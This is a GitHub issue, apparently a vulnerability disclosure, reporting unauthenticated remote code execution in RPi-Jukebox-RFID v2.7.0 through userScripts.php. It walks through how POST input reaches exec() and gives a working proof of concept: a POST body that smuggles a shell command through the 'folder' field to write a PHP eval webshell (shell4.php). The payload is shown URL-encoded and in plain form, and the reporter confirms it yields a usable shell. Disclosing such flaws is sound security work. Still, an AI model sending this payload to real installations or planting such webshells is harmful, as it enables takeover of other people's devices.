You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
I'm sorry for the issue with the PoC I wrote earlier. I forgot to escape @, which resulted in the generated webshell being unusable. Here is the correct PoC:
Version
v2.7.0
Branch
released
OS
ubuntu 22
Pi model
unknown
Hardware
No response
What happened?
Hello,
I would like to report for a RCE vulnerability in RPi-Jukebox-RFID-v2.7(No permissions required)
Analysis
The path of the vulnerability: htdocs\userScripts.php
Source from Line 46 (
$_POST['filename']
) .And then there is a check point(Line 62) ,which we should set
$_POST['ACTION'] = userScript
to bypass.After bypass the check point, the source(tainted) pass to
$exec
andexec($exec);
(Line 68) without another check.Poc
POST /htdocs/userScripts.php
Data:
ACTION=userScript&folder=hello+%3b+echo+%22%3c%3fphp+%40eval(%24_POST%5b%27pass%27%5d)+%3f%3e%22++%3e+.%2fshell4.php+%3b&folderNew=echo+%22hello%22
Here is the version without url encoding for ease of understanding:
ACTION=userScript&folder=hello ; echo "<?php @eval($_POST['pass']) ?>" > ./shell4.php ;&folderNew=echo "hello"
Manual verification
The attacker can then easily connect to this webshell(/htdocs/shell4.php)
Logs
No response
Configuration
No response
More info
No response
The text was updated successfully, but these errors were encountered: